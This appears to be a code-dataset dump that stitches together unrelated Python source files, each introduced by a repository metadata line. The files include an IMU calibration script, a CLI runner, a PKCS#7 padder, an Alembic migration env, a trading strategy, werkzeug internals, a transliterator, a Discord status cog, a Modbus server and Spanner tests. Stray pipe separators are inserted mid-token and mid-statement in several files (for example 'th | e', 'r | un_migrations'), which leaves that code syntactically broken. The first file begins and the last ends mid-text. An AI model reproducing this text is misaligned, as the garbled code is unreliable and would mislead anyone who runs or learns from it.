.. moduleauthor:: hbldh <henrik.blidh@nedomkull.com>
Created on 2015-08-26, 14:48
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import scipy.integrate as scint
import matplotlib.pyplot as plt
from pyberryimu.calibration.standard import StandardCalibration
from pyberryimu.container import BerryIMUDataContainer
data = BerryIMUDataContainer.load('rec_gyro.json')
sc1 = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu-BACKUP_g1')
sc1.gyro_bias_vector *= 57.2957795
sc1.gyro_scale_factor_vector *= | 57.2957795
sc2 = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu-BACKUP_g2')
sc_sh = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu | ')
sc_sh.set_datasheet_values_for_gyroscope(data.client_settings)
g_sc1 = []
g_sc2 = []
g_sh = []
for row in data.gyroscope:
g_sc1.append(sc1.transform_gyroscope_values(row.tolist()))
g_sc2.append(sc2.transform_gyroscope_values(row.tolist()))
g_sh.append(sc_sh.transform_gyroscope_values(row.tolist()))
d = 0
g_sc1 = np.array(g_sc1)
g_sc2 = np.array(g_sc2)
g_sh = np.array(g_sh)
plt.plot(g_sc1[:, d], 'b')
plt.plot(scint.cumtrapz(g_sh[:, d], dx=1/100.), 'm')
#plt.plot(g_sc2[:, d], 'g')
#plt.plot(g_sh[:, d], 'r')
plt.show()
|
techtonik/devassistant | devassistant/cli/cli_runner.py | Python | gpl-2.0 | 4,484 | 0.001561 | import logging
import os
import sys
import six
try:
# stdout/stdrr wrapper to render ANSI sequences in Windows
import colorama
colorama.init()
except ImportError:
pass
from devassistant import actions
from devassistant import bin
from devassistant.cli import argparse_generator
from devassistant import exceptions
from devassistant import logger
from devassistant import path_runner
from devassistant import settings
from devassistant import sigint_handler
from devassistant import utils
class CliRunner(object):
cur_handler = None
@classmethod
def register_console_logging_handler(cls, lgr, level=logging.INFO):
"""Registers console logging handler to given logger."""
console_handler = logger.DevassistantClHandler(sys.stdout)
if console_handler.stream.isatty():
console_handler.setFormatter(logger.DevassistantClColorFormatter())
else:
console_handler.setFormatter(logger.DevassistantClFormatter())
console_handler.setLevel(level)
cls.cur_handler = console_handler
lgr.addHandler(console_handler)
@classmethod
def change_logging_level(cls, level):
cls.cur_handler.setLevel(level)
@classmethod
def run(cls):
"""Runs the whole cli:
1. Registers console logging handler
2. Creates argparser from all assistants and actions
3. Parses args and decides what to run
4. Runs a proper assistant or action
"""
sigint_handler.override()
# set settings.USE_CACHE before constructing parser, since constructing
# parser requires loaded assistants
settings.USE_CACHE = False if '--no-cache' in sys.argv else True
cls.register_console_logging_handler(logger.logger)
is_log_file = logger.add_log_file_handler(settings.LOG_FILE)
if not is_log_file:
logger.logger.warning("Could not create log file '{0}'.".format(settings.LOG_FILE))
cls.inform_of_short_bin_name(sys.argv[0])
top_assistant = bin.TopAssistant()
tree = top_assistant.get_subassistant_tree()
argparser = argparse_generator.ArgparseGenerator.\
generate_argument_parser(tree, actions=actions.actions)
parsed_args = vars(argparser.parse_args())
parsed_args_decoded = dict()
for k, v in parsed_args.items():
parsed_args_decoded[k] = \
v.decode(utils.defenc) if not six.PY3 and isinstance(v, str) else v
parsed_args_decoded['__ui__'] = 'cli'
if parsed_args.get('da_debug'):
cls.change_logging_level(logging.DEBUG)
# Prepare Action/PathRunner
if actions.is_action_run(**parsed_args_decoded):
to_run = actions.get_action_to_run(**parsed_args_decoded)(**parsed_args_decoded)
else:
parsed_args = cls.transform_executable_assistant_alias(parsed_args_decoded)
path = top_assistant.get_selected_subassistant_path(**parsed_args_decoded)
to_run = path_runner.PathRunner(path, parsed_args_decoded)
try:
to_run.run()
except exceptions.ExecutionException:
# error is already logged, just catch it and silently exit here
sys.exit(1)
@classmethod
def inform_of_short_bin_name(cls, binary):
"""Historically, we had "devassistant" binary, but we chose to go with
shorter "da". We still allow "devassistant", but we recommend using "da".
"""
binary = os.path.splitext(os.path.basename(binary))[0]
if binary != 'da':
msg = '"da" is the pre | ffered way of running "{binary}".'.format(binary=binary)
logger.logger.info('*' * len(msg))
logger.logger.info(msg)
| logger.logger.info('*' * len(msg))
@classmethod
def transform_executable_assistant_alias(cls, parsed_args):
key = settings.SUBASSISTANT_N_STRING.format(0)
for assistant in [bin.CreatorAssistant, bin.TweakAssistant,
bin.PreparerAssistant, bin.ExtrasAssistant]:
if parsed_args[key] in assistant.aliases:
parsed_args[key] = assistant.name
return parsed_args
if __name__ == '__main__':
# this is here mainly because of utils.cl_string_from_da_eval
# because it's the safest way to invoke DA on commandline
# (invoking "da" binary is not safe because we can use os.chdir and so on)
CliRunner.run()
|
mooosu/python-utils | encrypt/pkcs7.py | Python | apache-2.0 | 1,944 | 0.003086 | import binascii
import StringIO
class PKCS7Encoder(object):
'''
RFC 2315: PKCS#7 page 21
Some content-encryption algorithms assume the
input length is a multiple of k octets, where k > 1, and
let the application define a method for handling inputs
whose lengths are not a multiple of k octets. For such
algorithms, the method shall be to pad the input at the
trailing end with k - (l mod k) octets all having value k -
(l mod k), where l is the length of the input | . In oth | er
words, the input is padded at the trailing end with one of
the following strings:
01 -- if l mod k = k-1
02 02 -- if l mod k = k-2
.
.
.
k k ... k k -- if l mod k = 0
The padding can be removed unambiguously since all input is
padded and no padding string is a suffix of another. This
padding method is well-defined if and only if k < 256;
methods for larger k are an open issue for further study.
'''
def __init__(self, k=16):
self.k = k
## @param text The padded text for which the padding is to be removed.
# @exception ValueError Raised when the input padding is missing or corrupt.
def decode(self, text):
'''
Remove the PKCS#7 padding from a text string
'''
nl = len(text)
val = int(binascii.hexlify(text[-1]), 16)
if val > self.k:
raise ValueError('Input is not padded or padding is corrupt')
l = nl - val
return text[:l]
## @param text The text to encode.
def encode(self, text):
'''
Pad an input string according to PKCS#7
'''
l = len(text)
output = StringIO.StringIO()
val = self.k - (l % self.k)
for _ in xrange(val):
output.write('%02x' % val)
return text + binascii.unhexlify(output.getvalue())
|
bryanforbes/Erasmus | alembic/env.py | Python | bsd-3-clause | 2,487 | 0.000402 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
from erasmus.db import db
from botus_receptus.config import load
from pathlib import Path
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = db
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url, target_metadata=target_metadata, literal_binds=True)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
bot_config = load(Path(__file__).resolve().parent.parent / 'config.toml')
connectable = engine_from_config(
config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool,
url=bot_config['db_url'],
)
def process_revision_directives(context, revision, directives):
if config.cmd_opts.autogenerate:
script = directives[0]
if script.upgrade_ops.is_empty():
directives[:] = []
with connectable.connect() as connection:
context.configure(
connection=connection,
target_metadata=target_metadata,
process_revision_directives=process_revision_directives,
)
with context.begin_transaction():
context.r | un_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migration | s_online()
|
cgqyh/pyalgotrade-mod | samples/bccharts_example_2.py | Python | apache-2.0 | 3,396 | 0.000883 | from pyalgotrade import bar
from pyalgotrade import strategy
from pyalgotrade import plotter
from pyalgotrade.technical import vwap
from pyalgotrade.barfeed import csvfeed
from pyalgotrade.bitstamp import broker
from pyalgotrade import broker as basebroker
class VWAPMomentum(strategy.BacktestingStrategy):
MIN_TRADE = 5
def __init__(self, feed, brk, instrument, vwapWindowSize, buyThreshold, sellThreshold):
strategy.BacktestingStrategy.__init__(self, feed, brk)
self.__instrument = instrument
self.__vwap = vwap.VWAP(feed[instrument], vwapWindowSize)
self.__buyThreshold = buyThreshold
self.__sellThreshold = sellThreshold
def _getActiveOrders(self):
orders = self.getBroker().getActiveOrders()
buy = filter(lambda o: o.isBuy(), orders)
sell = filter(lambda o: o.isSell(), orders)
return buy, sell
def _cancelOrders(self, orders):
brk = self.getBroker()
for o in orders:
self.info("Canceling order %s" % (o.getId()))
brk.cancelOrder(o)
def _buySignal(self, price):
buyOrders, sellOrders = self._getActiveOrders()
self._cancelOrders(sellOrders)
brk = self.getBroker()
cashAvail = brk.getCash() * 0.98
size = round(cashAvail / price, 3)
if len(buyOrders) == 0 and price*size > VWAPMomentum.MIN_TRADE:
self.info("Buy %s at %s" % (size, price))
try:
self.limitOrder(self.__instrument, price, size)
except Exception, e:
self.error("Failed to buy: %s" % (e))
def _sellSignal(self, price):
buyOrders, sellOrders = self._getActiveOrders()
self._cancelOrders(buyOrders)
brk = self.getBroker()
shares = brk.getShares(self.__instrument)
if len(sellOrders) == 0 and shares > 0:
self.info("Sell %s at %s" % (shares, price))
self.limitOrder(self.__instrument, price, shares*-1)
def getVWAP(self):
return self.__vwap
def onBars(self, bars):
vwap = self.__vwap[-1]
if vwap is None:
return
price = bars[self.__instrument].getClose()
if price > vwap * (1 + self.__buyThreshold):
self._buySignal(price)
elif price < vwap * (1 - self.__sellThreshold):
self._sellSignal(price)
def onOrderUpdated(self, order):
if order.isBuy():
orderType = "Buy"
else:
orderType = "Sell"
self.info("%s order %d updated - Status: %s - %s" % (
orderType,
order.getId(),
basebroker.Order.State.toString(order.getState()),
order.getExecutionInfo(),
| ))
def main(plot):
i | nstrument = "BTC"
initialCash = 1000
vwapWindowSize = 100
buyThreshold = 0.02
sellThreshold = 0.01
barFeed = csvfeed.GenericBarFeed(bar.Frequency.MINUTE*30)
barFeed.addBarsFromCSV(instrument, "30min-bitstampUSD.csv")
brk = broker.BacktestingBroker(initialCash, barFeed)
strat = VWAPMomentum(barFeed, brk, instrument, vwapWindowSize, buyThreshold, sellThreshold)
if plot:
plt = plotter.StrategyPlotter(strat)
plt.getInstrumentSubplot(instrument).addDataSeries("VWAP", strat.getVWAP())
strat.run()
if plot:
plt.plot()
if __name__ == "__main__":
main(True)
|
syrrim/werkzeug | werkzeug/_internal.py | Python | bsd-3-clause | 13,953 | 0.001433 | # -*- coding: utf-8 -*-
"""
werkzeug._internal
~~~~~~~~~~~~~~~~~~
This module provides internally used helpers and constants.
:copyright: (c) 2014 by | the Werkzeug Team, see AUTHORS for more details.
:l | icense: BSD, see LICENSE for more details.
"""
import re
import string
import inspect
from weakref import WeakKeyDictionary
from datetime import datetime, date
from itertools import chain
from werkzeug._compat import iter_bytes, text_type, BytesIO, int_to_byte, \
range_type, integer_types
_logger = None
_empty_stream = BytesIO()
_signature_cache = WeakKeyDictionary()
_epoch_ord = date(1970, 1, 1).toordinal()
_cookie_params = set((b'expires', b'path', b'comment',
b'max-age', b'secure', b'httponly',
b'version'))
_legal_cookie_chars = (string.ascii_letters +
string.digits +
u"!#$%&'*+-.^_`|~:").encode('ascii')
_cookie_quoting_map = {
b',': b'\\054',
b';': b'\\073',
b'"': b'\\"',
b'\\': b'\\\\',
}
for _i in chain(range_type(32), range_type(127, 256)):
_cookie_quoting_map[int_to_byte(_i)] = ('\\%03o' % _i).encode('latin1')
_octal_re = re.compile(b'\\\\[0-3][0-7][0-7]')
_quote_re = re.compile(b'[\\\\].')
_legal_cookie_chars_re = b'[\w\d!#%&\'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]'
_cookie_re = re.compile(b"""(?x)
(
(?P<key>[^=]+)
\s*=\s*
)? # Without equals sign, the key is empty - see http://stackoverflow.com/a/1969339/4455114
(?P<val>
"(?:[^\\\\"]|\\\\.)*" |
(?:.*?)
)
\s*;
""")
class _Missing(object):
def __repr__(self):
return 'no value'
def __reduce__(self):
return '_missing'
_missing = _Missing()
def _get_environ(obj):
env = getattr(obj, 'environ', obj)
assert isinstance(env, dict), \
'%r is not a WSGI environment (has to be a dict)' % type(obj).__name__
return env
def _log(type, message, *args, **kwargs):
"""Log into the internal werkzeug logger."""
global _logger
if _logger is None:
import logging
_logger = logging.getLogger('werkzeug')
# Only set up a default log handler if the
# end-user application didn't set anything up.
if not logging.root.handlers and _logger.level == logging.NOTSET:
_logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
_logger.addHandler(handler)
getattr(_logger, type)(message.rstrip(), *args, **kwargs)
def _parse_signature(func):
"""Return a signature object for the function."""
if hasattr(func, 'im_func'):
func = func.im_func
# if we have a cached validator for this function, return it
parse = _signature_cache.get(func)
if parse is not None:
return parse
# inspect the function signature and collect all the information
if hasattr(inspect, 'getfullargspec'):
tup = inspect.getfullargspec(func)
else:
tup = inspect.getargspec(func)
positional, vararg_var, kwarg_var, defaults = tup[:4]
defaults = defaults or ()
arg_count = len(positional)
arguments = []
for idx, name in enumerate(positional):
if isinstance(name, list):
raise TypeError('cannot parse functions that unpack tuples '
'in the function signature')
try:
default = defaults[idx - arg_count]
except IndexError:
param = (name, False, None)
else:
param = (name, True, default)
arguments.append(param)
arguments = tuple(arguments)
def parse(args, kwargs):
new_args = []
missing = []
extra = {}
# consume as many arguments as positional as possible
for idx, (name, has_default, default) in enumerate(arguments):
try:
new_args.append(args[idx])
except IndexError:
try:
new_args.append(kwargs.pop(name))
except KeyError:
if has_default:
new_args.append(default)
else:
missing.append(name)
else:
if name in kwargs:
extra[name] = kwargs.pop(name)
# handle extra arguments
extra_positional = args[arg_count:]
if vararg_var is not None:
new_args.extend(extra_positional)
extra_positional = ()
if kwargs and kwarg_var is None:
extra.update(kwargs)
kwargs = {}
return new_args, kwargs, missing, extra, extra_positional, \
arguments, vararg_var, kwarg_var
_signature_cache[func] = parse
return parse
def _date_to_unix(arg):
"""Converts a timetuple, integer or datetime object into the seconds from
epoch in utc.
"""
if isinstance(arg, datetime):
arg = arg.utctimetuple()
elif isinstance(arg, integer_types + (float,)):
return int(arg)
year, month, day, hour, minute, second = arg[:6]
days = date(year, month, 1).toordinal() - _epoch_ord + day - 1
hours = days * 24 + hour
minutes = hours * 60 + minute
seconds = minutes * 60 + second
return seconds
class _DictAccessorProperty(object):
"""Baseclass for `environ_property` and `header_property`."""
read_only = False
def __init__(self, name, default=None, load_func=None, dump_func=None,
read_only=None, doc=None):
self.name = name
self.default = default
self.load_func = load_func
self.dump_func = dump_func
if read_only is not None:
self.read_only = read_only
self.__doc__ = doc
def __get__(self, obj, type=None):
if obj is None:
return self
storage = self.lookup(obj)
if self.name not in storage:
return self.default
rv = storage[self.name]
if self.load_func is not None:
try:
rv = self.load_func(rv)
except (ValueError, TypeError):
rv = self.default
return rv
def __set__(self, obj, value):
if self.read_only:
raise AttributeError('read only property')
if self.dump_func is not None:
value = self.dump_func(value)
self.lookup(obj)[self.name] = value
def __delete__(self, obj):
if self.read_only:
raise AttributeError('read only property')
self.lookup(obj).pop(self.name, None)
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
self.name
)
def _cookie_quote(b):
buf = bytearray()
all_legal = True
_lookup = _cookie_quoting_map.get
_push = buf.extend
for char in iter_bytes(b):
if char not in _legal_cookie_chars:
all_legal = False
char = _lookup(char, char)
_push(char)
if all_legal:
return bytes(buf)
return bytes(b'"' + buf + b'"')
def _cookie_unquote(b):
if len(b) < 2:
return b
if b[:1] != b'"' or b[-1:] != b'"':
return b
b = b[1:-1]
i = 0
n = len(b)
rv = bytearray()
_push = rv.extend
while 0 <= i < n:
o_match = _octal_re.search(b, i)
q_match = _quote_re.search(b, i)
if not o_match and not q_match:
rv.extend(b[i:])
break
j = k = -1
if o_match:
j = o_match.start(0)
if q_match:
k = q_match.start(0)
if q_match and (not o_match or k < j):
_push(b[i:k])
_push(b[k + 1:k + 2])
i = k + 2
else:
_push(b[i:j])
rv.append(int(b[j + 1:j + 4], 8))
i = j + 4
return bytes(rv)
def _cookie_parse_impl(b):
"""Lowlevel cookie parsing facility that operates on bytes."""
i = 0
n = len(b)
while i < n:
match = _cookie_re.search(b + b';', i)
if not match:
break
key = (match.group('key') or '').strip()
value = match.group('val').strip()
i = match.end(0)
|
smc/silpa | src/silpa/modules/transliterator/cmudict.py | Python | agpl-3.0 | 5,575 | 0.071214 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Any Indian Language to any other Indian language transliterator
# Copyright 2008-2010 Santhosh Thottingal <santhosh.thottingal@gmail.com>
# http://www.smc.org.in
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either versi | on 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have rec | eived a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# If you find any bugs or have any suggestions email: santhosh.thottingal@gmail.com
# URL: http://www.smc.org.in
import string
import os
CMU_MALAYALAM_MAP = {
"AA" : "ഓ",
"AH" : "അ",
"AE" : "ഏ",
"AO" : "ഓ",
"AW" : "ഔ",
"AY" : "ഐ",
"B" : "ബ്",
"CH" : "ച്ച്",
"D" : "ഡ്",
"DH" : "ദ്",
"EA" : "ഈ",
"EH" : "എ",
"ER" : "എര്",
"EY" : "എയ്",
"F" : "ഫ്",
"G" : "ഗ്",
"HH" : "ഹ്",
"IH" : "ഇ",
"IY" : "ഈ",
"J" : "ജ്",
"JH" : "ജ്",
"K" : "ക്",
"L" : "ല്",
"M" : "മ്",
"N" : "ന്",
"NG" : "ങ്",
"OW" : "ഒ",
"P" : "പ്",
"R" : "ര്",
"S" : "സ്",
"SH" : "ഷ്",
"T" : "റ്റ്",
"TH" : "ത്",
"Y" : "യ്",
"UW" : "ഉ",
"W" : "വ്",
"V" : "വ്",
"Z" : "സ്",
}
CMU_KANNADA_MAP = {
"AA" : "ಆ",
"AH" : "ಅ",
"AE" : "ಏ",
"AO" : "ಓ",
"AW" : "ಔ",
"AY" : "ಐ",
"B" : "ಬ್",
"CH" : "ಚ್",
"D" : "ಡ್",
"DH" : "ದ್",
"EA" : "ಈ",
"EH" : "ಎ",
"ER" : "ಅರ್",
"EY" : "ಎಯ್",
"F" : "ಫ್",
"G" : "ಗ್",
"HH" : "ಹ್",
"IH" : "ಇ",
"IY" : "ಈ",
"J" : "ಜ್",
"JH" : "ಜ್",
"K" : "ಕ್",
"L" : "ಲ್",
"M" : "ಮ್",
"N" : "ನ್",
"NG" : "ಂಗ್",
"OW" : "ಒ",
"P" : "ಪ್",
"R" : "ರ್",
"S" : "ಸ್",
"SH" : "ಷ್",
"T" : "ಟ್",
"TH" : "ತ್",
"Y" : "ಯ್",
"UW" : "ಊ",
"UH":"ಉ",
"W" : "ವ್",
"V" : "ವ್",
"Z":"ಸ್",
"ZH":"ಷ್",
}
class CMUDict():
def __init__(self):
self.dictionaryfile=os.path.join(os.path.dirname(__file__), 'cmudict.0.7a_SPHINX_40')
self.cmudictionary = None
def load(self):
fdict = open(self.dictionaryfile, "r")
flines = fdict.readlines()
linecount = len(flines)
self.cmudictionary = dict()
for line in flines:
line = line.strip()
lhs = line.split()[0]
rhs = line.split()[1:]
self.cmudictionary[lhs] = rhs
def find(self, word):
if self.cmudictionary== None:
self.load()
return self.cmudictionary[word.upper()]
def pronunciation(self,word, language):
stripped_word = word.strip('!,.?:')
punctuations = word[len(stripped_word):]
try:
cmu_pronunciation = self.find(stripped_word)
except KeyError:
#print "could not find the word " + stripped_word + " in dictionary"
return word
pronunciation_str = ""
if language =="ml_IN":
for syl in cmu_pronunciation:
try:
pronunciation_str += CMU_MALAYALAM_MAP[syl]
except KeyError:
pronunciation_str += syl
pronunciation_str = self._fix_vowel_signs_ml(pronunciation_str)
if language == "kn_IN":
for symbol in cmu_pronunciation:
try:
pronunciation_str += CMU_KANNADA_MAP[symbol]
except KeyError:
pronunciation_str += symbol
pronunciation_str = self._fix_vowel_signs_kn(pronunciation_str)
return (pronunciation_str).decode("utf-8") + punctuations
def _fix_vowel_signs_ml(self,text) :
text= text.replace("്അ","")
text= text.replace("്അ","")
text= text.replace("്ആ","ാ")
text= text.replace("്ആ","ാ")
text= text.replace("്ഇ","ി")
text= text.replace("്ഇ","ി")
text= text.replace("്ഈ","ീ")
text= text.replace("്ഈ","ീ")
text= text.replace("്ഉ","ു")
text= text.replace("്ഉ","ു")
text= text.replace("്ഊ","ൂ")
text= text.replace("്ഊ","ൂ")
text= text.replace("്റ","്ര")
text= text.replace("്എ","െ")
text= text.replace("്എ","")
text= text.replace("്ഏ","േ")
text= text.replace("്ഏ","േ")
text= text.replace("്ഐ","ൈ")
text= text.replace("്ഐ","ൈ")
text= text.replace("്ഒ","ൊ")
text= text.replace("്ഒ","ൊ")
text= text.replace("്ഓ","ോ")
text= text.replace("്ഓ","ോ")
text= text.replace("്ഔ","ൌ")
text= text.replace("്ഔ","ൌ")
text= text.replace("ര്ര","റ്റ")
text= text.replace("റ്ര","റ്റ")
text= text.replace("ന്റ്റ","ന്റ")
return text
def _fix_vowel_signs_kn(self,text) :
text= text.replace("್ಅ","")
text= text.replace("್ಆ","ಾ")
text= text.replace("್ಇ","ಿ")
text= text.replace("್ಈ","ೀ")
text= text.replace("್ಉ","ು")
text= text.replace("್ಊ","ೂ")
text= text.replace("್ಋ","ೃ")
text= text.replace("್ಎ","ೆ")
text= text.replace("್ಏ","ೇ")
text= text.replace("್ಐ","ೈ")
text= text.replace("್ಒ","ೊ")
text= text.replace("್ಓ","ೋ")
text= text.replace("್ಔ","ೌ")
return text
|
tekulvw/Squid-Plugins | selfbotstatus/selfbotstatus.py | Python | mit | 1,817 | 0 | import keyboard as kb
import time
import discord
import asyncio
class SelfBotStatus:
def __init__(self, bot):
self.bot = bot
self.is_online = True
self._last_time = 0
kb.hook(self.kb_press)
self.status_task = None
self.start = False
def __unload(self):
try:
self.status_task.cancel()
except AttributeError:
pass
def kb_press(self, event):
if not self.start:
return
etime = event.time
if self.is_online is True:
try:
self.status_task.cancel()
except AttributeError:
pass
self.status_task = self.bot.loop.create_task(
self._set_idle(etime + 300))
elif self.is_online is False:
self.status_task = self.bot.loop.create_task(
self._set_online())
self._last_time = etime
def _get_game(self):
try:
me = list(self.bot.servers)[0].me
game = me.game
except IndexError:
game = None
return game
async def _set_idle(self, ttl):
while time.time() < ttl:
asyncio.sleep(1)
game = self._get_game()
await self.bot.change_presence(game=game, status=discord.Status.idle,
afk=True)
self.is_online = False
async def _set_online(self, ttl=0):
while time.time() < ttl:
asyncio.sleep(1)
game = self._get_game()
await self.bot.change_presence(game=game, | st | atus=discord.Status.online,
afk=False)
self.is_online = True
async def on_ready(self):
self.start = True
def setup(bot):
bot.add_cog(SelfBotStatus(bot))
|
mjfarmer/scada_py | pymodbus/examples/common/callback-server.py | Python | gpl-3.0 | 5,075 | 0.010443 | #!/usr/bin/env python
'''
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
'''
#---------------------------------------------------------------------------#
# import the modbus libraries we need
#---------------------------------------------------------------------------#
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
#---------------------------------------------------------------------------#
# import the python libraries we need
#---------------------------------------------------------------------------#
from multiprocessing import Queue, Process
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
#---------------------------------------------------------------------------#
# create your custom data block with callbacks
#---------------------------------------------------------------------------#
class CallbackDataBlock(ModbusSparseDataBlock):
''' A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
'''
def __init__(self, devices, queue):
'''
'''
self.devices = devices
self.queue = queue
values = {k:0 for k in devices.iterkeys()}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, | self).__init__(values)
def setValues(self, address, value):
| ''' Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
'''
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
#---------------------------------------------------------------------------#
# define your callback process
#---------------------------------------------------------------------------#
def rescale_value(value):
''' Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
'''
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
def device_writer(queue):
''' A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
'''
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
#---------------------------------------------------------------------------#
# initialize your device map
#---------------------------------------------------------------------------#
def read_device_map(path):
''' A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
'''
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
|
hasgeek/lastuser | lastuser_ui/views/index.py | Python | bsd-2-clause | 174 | 0 | # -*- coding: | utf-8 -*-
from flask import render_template
from .. import lastuser_ui
@lastuser_ui.route('/')
def | index():
return render_template('index.html.jinja2')
|
jonparrott/google-cloud-python | spanner/tests/unit/test_streamed.py | Python | apache-2.0 | 40,891 | 0 | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
class TestStreamedResultSet(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.streamed import StreamedResultSet
return StreamedResultSet
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
self.assertIs(streamed._response_iterator, iterator)
self.assertIsNone(streamed._source)
self.assertEqual(list(streamed), [])
self.assertIsNone(streamed.metadata)
self.assertIsNone(streamed.stats)
def test_ctor_w_source(self):
iterator = _MockCancellableIterator()
source = object()
streamed = self._make_one(iterator, source=source)
self.assertIs(streamed._response_iterator, iterator)
self.assertIs(streamed._source, source)
self.assertEqual(list(streamed), [])
self.assertIsNone(streamed.metadata)
self.assertIsNone(streamed.stats)
def test_fields_unset(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
with self.assertRaises(AttributeError):
streamed.fields
@staticmethod
def _make_scalar_field(name, type_):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
return StructType.Field(name=name, type=Type(code=type_))
@staticmethod
def _make_array_field(name, element_type_code=None, element_type=None):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
if element_type is None:
element_type = Type(code=element_type_code)
array_type = Type(
code='ARRAY', array_element_type=element_type)
return StructType.Field(name=name, type=array_type)
@staticmethod
def _make_struct_type(struct_type_fields):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
fields = [
StructType.Field(name=key, type=Type(code=value))
for key, value in struct_type_fields
]
struct_type = StructType(fields=fields)
return Type(code='STRUCT', struct_type=struct_type)
@staticmethod
def _make_value(value):
from google.cloud.spanner_v1._helpers import _make_value_pb
return _make_value_pb(value)
@staticmethod
def _make_list_value(values=(), value_pbs=None):
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Value
from google.cloud.spanner_v1._helpers import _make_list_value_pb
if value_pbs is not None:
return Value(list_value=ListValue(values=value_pbs))
return Value(list_value=_make_list_value_pb(values))
@staticmethod
def _make_result_set_metadata(fields=(), transaction_id=None):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
ResultSetMetadata)
metadata = ResultSetMetadata()
for field in fields:
metadata.row_type.fields.add().CopyFrom(field)
if transaction_id is not None:
metadata.transaction.id = transaction_id
return metadata
@staticmethod
